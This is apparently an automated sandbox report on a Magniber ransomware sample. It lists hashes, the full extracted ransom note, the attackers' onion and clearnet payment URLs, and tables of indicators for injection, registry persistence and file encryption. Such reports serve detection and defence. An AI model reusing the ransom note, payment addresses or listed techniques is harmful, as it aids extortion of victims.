magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Resubmissions

06/11/2021, 17:35

211106-v6ceqsehb2 10

06/11/2021, 17:33

211106-v49bpacbhn 10

Analysis

max time kernel
144s
max time network
139s
platform
windows10_x64
resource
win10-en-20211104
submitted
06/11/2021, 17:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://4ea45ef812585200feltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://4ea45ef812585200feltalkfzj.jobsbig.cam/eltalkfzj http://4ea45ef812585200feltalkfzj.boxgas.icu/eltalkfzj http://4ea45ef812585200feltalkfzj.sixsees.club/eltalkfzj http://4ea45ef812585200feltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://4ea45ef812585200feltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://4ea45ef812585200feltalkfzj.jobsbig.cam/eltalkfzj

http://4ea45ef812585200feltalkfzj.boxgas.icu/eltalkfzj

http://4ea45ef812585200feltalkfzj.sixsees.club/eltalkfzj

http://4ea45ef812585200feltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1756	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1904	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3444	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2816	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2828	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1296	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2156	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	608	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3312	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	676	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4108	2232	cmd.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4164	2232	cmd.exe	91

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\StopInitialize.tiff => C:\Users\Admin\Pictures\StopInitialize.tiff.eltalkfzj	svchost.exe
File renamed	C:\Users\Admin\Pictures\UpdateShow.png => C:\Users\Admin\Pictures\UpdateShow.png.eltalkfzj	svchost.exe
File renamed	C:\Users\Admin\Pictures\AssertStop.raw => C:\Users\Admin\Pictures\AssertStop.raw.eltalkfzj	svchost.exe
File renamed	C:\Users\Admin\Pictures\RemoveConvertTo.raw => C:\Users\Admin\Pictures\RemoveConvertTo.raw.eltalkfzj	svchost.exe
File renamed	C:\Users\Admin\Pictures\WriteOpen.raw => C:\Users\Admin\Pictures\WriteOpen.raw.eltalkfzj	svchost.exe
File renamed	C:\Users\Admin\Pictures\DismountStep.png => C:\Users\Admin\Pictures\DismountStep.png.eltalkfzj	svchost.exe
File renamed	C:\Users\Admin\Pictures\SelectDisconnect.png => C:\Users\Admin\Pictures\SelectDisconnect.png.eltalkfzj	svchost.exe
File opened for modification	C:\Users\Admin\Pictures\StopInitialize.tiff	svchost.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3064 set thread context of 2620	3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	24
PID 3064 set thread context of 2636	3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	23
PID 3064 set thread context of 2872	3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	22
PID 3064 set thread context of 3048	3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	21
PID 3064 set thread context of 3432	3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	19
PID 3064 set thread context of 3708	3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	18

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\win.ini	unregmp2.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3332	3708	WerFault.exe	18

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListTTL = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Capabilities	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Hidden = "0"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\BrowserEmulation	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\OperationalData = "12"	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.wms\OpenWithProgIds	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-ms-wmd	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-flac\CLSID = "{cd3afa7f-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.wma	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.ADTS\PreferExecuteOnMismatch = "1"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/3gpp\CLSID = "{cd3afa97-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\https\shell\ = "open"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mailto\shell\open	ie4uinit.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\.mts	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\ = "htmlfile"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\ShellEx\IconHandler	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.snd\MP2.Last = "Custom"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-midi\CLSID = "{cd3afa74-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\printto\command	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP11.AssocFile.MP4\PreferExecuteOnMismatch = "1"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.xht	ie4uinit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\.mpeg\MP2.Last = "Custom"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-mpeg	unregmp2.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.snd\OpenWithProgIds\WMP11.AssocFile.AU = "0"	unregmp2.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedWidth = "800"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\ShellEx\ContextMenuHandlers\{FBF23B40-E3F0-101B-8488-00AA003E56F8}	ie4uinit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mp2v\OpenWithProgIds\WMP11.AssocFile.MPEG = "0"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.mpv2	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.partial\OpenWithProgIds\IE.AssocFile.PARTIAL	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3DC7A020-0ACD-11CF-A9BB-00AA004AE837}	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\.mts\MP2.Last = "Custom"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/avi\CLSID = "{cd3afa88-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\opennew\command\ = "\"C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE\" %1"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/x-matroska\CLSID = "{cd3afa9c-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.wmv	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000260f1a71508950c65487a1ad534a8173cecb59dc67e398a895c8f14c499554acd5bbe3318fa3bcdbabd75a80be77ea7be1e2562009be5f2febd7697f0287c57e0185f5404767f9cc212d413ae59646e9f72654310412e76f157c14f815ba1cb5fc8b0ed1cc73fa4469a8680f4b460a8ce2b79e611d7fd51b6cd5c09b7fcec1b046ef0d89f16859e6f06728aaf3264c90eab5678605a5afb2dd032cf6c06378b1cfcf2a1117e7429bc38ceca9add82a3ec14076ada8239a58cf26a2b78b19ff54614d2076ec8e4472b736313b25fb3bcdbb7858a5939bbb3a695f5480c690383bef8751586bff980e0a85b795ae2ee646437ea358bdac0d898ccc26fd1f69b6ac669f4aed91d854a410998f9ce7133c797a7049f49ff678f9fb8ee6553042a955c0b399ce90baa68abf914fe2584928f97f6f5adffe1918e07dc66de60cbcd21049e5219d5c46f255d38f3a49826f7c35799b348621b5f4d716926e4ee47757c0d853766e861a8d8725b23cfcf027cf96471477f1386ac0f2de1302cbcd13153af51f7a0e44d8aad0531af9af4e10d7b628fa872c4bd87f87c12080bfd0575a2f5b05e135aa7a	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	ie4uinit.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\.mpa\OpenWithProgids\WMP11.AssocFile.MPEG = "0"	unregmp2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\.wma\MP2.Last = "Custom"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.mpg	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-ms-wax\CLSID = "{cd3afa83-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\video/mpeg\CLSID = "{cd3afa89-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0f947edc34d3d701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\https\shell\open\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\open\command	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Microsoft.Website\Shell\Open\	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.aiff\MPlayer2.BAK = "VLC.aiff"	unregmp2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AudioCD\DefaultIcon	unregmp2.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\.mpeg	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\audio/x-wav\CLSID = "{cd3afa7b-b84f-48f0-9393-7edc34128127}"	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\InternetShortcut\DefaultIcon\ = "%SystemRoot%\\system32\\url.dll,5"	ie4uinit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\xhtmlfile\shell\opennew\command\DelegateExecute = "{17FE9752-0B5A-4665-84CD-569794602F5C}"	ie4uinit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\command	unregmp2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\SupportedTypes\.adts	unregmp2.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1400	notepad.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3332	WerFault.exe
3332	WerFault.exe
3332	WerFault.exe
3332	WerFault.exe
3332	WerFault.exe
3332	WerFault.exe
3332	WerFault.exe
3332	WerFault.exe
3332	WerFault.exe
3332	WerFault.exe
3332	WerFault.exe
3332	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3048	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
2572	MicrosoftEdgeCP.exe
2572	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3332	WerFault.exe
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1680	WMIC.exe
Token: SeSecurityPrivilege	1680	WMIC.exe
Token: SeTakeOwnershipPrivilege	1680	WMIC.exe
Token: SeLoadDriverPrivilege	1680	WMIC.exe
Token: SeSystemProfilePrivilege	1680	WMIC.exe
Token: SeSystemtimePrivilege	1680	WMIC.exe
Token: SeProfSingleProcessPrivilege	1680	WMIC.exe
Token: SeIncBasePriorityPrivilege	1680	WMIC.exe
Token: SeCreatePagefilePrivilege	1680	WMIC.exe
Token: SeBackupPrivilege	1680	WMIC.exe
Token: SeRestorePrivilege	1680	WMIC.exe
Token: SeShutdownPrivilege	1680	WMIC.exe
Token: SeDebugPrivilege	1680	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1680	WMIC.exe
Token: SeRemoteShutdownPrivilege	1680	WMIC.exe
Token: SeUndockPrivilege	1680	WMIC.exe
Token: SeManageVolumePrivilege	1680	WMIC.exe
Token: 33	1680	WMIC.exe
Token: 34	1680	WMIC.exe
Token: 35	1680	WMIC.exe
Token: 36	1680	WMIC.exe
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	3852	WMIC.exe
Token: SeSecurityPrivilege	3852	WMIC.exe
Token: SeTakeOwnershipPrivilege	3852	WMIC.exe
Token: SeLoadDriverPrivilege	3852	WMIC.exe
Token: SeSystemProfilePrivilege	3852	WMIC.exe
Token: SeSystemtimePrivilege	3852	WMIC.exe
Token: SeProfSingleProcessPrivilege	3852	WMIC.exe
Token: SeIncBasePriorityPrivilege	3852	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
948	ComputerDefaults.exe
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE
3048	Explorer.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3048	Explorer.EXE
4780	MicrosoftEdge.exe
2572	MicrosoftEdgeCP.exe
2572	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3048	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2636 wrote to memory of 1400	2636	svchost.exe	70
PID 2636 wrote to memory of 1400	2636	svchost.exe	70
PID 2636 wrote to memory of 744	2636	svchost.exe	72
PID 2636 wrote to memory of 744	2636	svchost.exe	72
PID 2636 wrote to memory of 1600	2636	svchost.exe	73
PID 2636 wrote to memory of 1600	2636	svchost.exe	73
PID 2636 wrote to memory of 3388	2636	svchost.exe	76
PID 2636 wrote to memory of 3388	2636	svchost.exe	76
PID 3388 wrote to memory of 1680	3388	cmd.exe	82
PID 3388 wrote to memory of 1680	3388	cmd.exe	82
PID 2620 wrote to memory of 1804	2620	sihost.exe	78
PID 2620 wrote to memory of 1804	2620	sihost.exe	78
PID 2620 wrote to memory of 1068	2620	sihost.exe	79
PID 2620 wrote to memory of 1068	2620	sihost.exe	79
PID 1600 wrote to memory of 3852	1600	cmd.exe	83
PID 1600 wrote to memory of 3852	1600	cmd.exe	83
PID 2872 wrote to memory of 3292	2872	taskhostw.exe	84
PID 2872 wrote to memory of 3292	2872	taskhostw.exe	84
PID 2872 wrote to memory of 1196	2872	taskhostw.exe	87
PID 2872 wrote to memory of 1196	2872	taskhostw.exe	87
PID 1068 wrote to memory of 1392	1068	cmd.exe	88
PID 1068 wrote to memory of 1392	1068	cmd.exe	88
PID 3048 wrote to memory of 1740	3048	Explorer.EXE	89
PID 3048 wrote to memory of 1740	3048	Explorer.EXE	89
PID 3048 wrote to memory of 1644	3048	Explorer.EXE	90
PID 3048 wrote to memory of 1644	3048	Explorer.EXE	90
PID 1804 wrote to memory of 3004	1804	cmd.exe	94
PID 1804 wrote to memory of 3004	1804	cmd.exe	94
PID 3432 wrote to memory of 4052	3432	RuntimeBroker.exe	95
PID 3432 wrote to memory of 4052	3432	RuntimeBroker.exe	95
PID 3432 wrote to memory of 2960	3432	RuntimeBroker.exe	104
